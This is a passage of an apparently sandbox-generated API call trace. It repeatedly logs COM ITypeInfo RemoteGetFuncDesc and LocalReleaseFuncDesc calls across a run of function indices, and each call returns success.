ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x18, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x19, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1a, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1b, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1c, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1d, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1e, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1f, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x20, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x21, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x22, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x23, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x24, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x25, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x26, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x27, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x28, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.229] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x29, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2a, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2b, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2c, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2d, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2e, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2f, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x30, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x31, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x32, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x33, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x34, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x35, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x36, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x37, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x38, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x39, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3a, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3b, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3c, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3d, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.230] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3e, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3f, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x40, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x41, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x42, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x43, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x44, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x45, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x46, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x47, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x48, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x49, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4a, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4b, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4c, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4d, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4e, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4f, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x50, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x51, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x52, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x53, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.231] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x54, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x55, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x56, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x57, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x58, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x59, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5a, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5b, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5c, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5d, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5e, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5f, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x60, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x61, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x62, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x63, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x64, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x65, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x66, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x67, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x68, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x69, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6a, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.232] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6b, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6c, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6d, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6e, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6f, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x70, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x71, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x72, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x73, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x74, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x75, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x76, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x77, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x78, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x79, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7a, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7b, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7c, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7d, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc 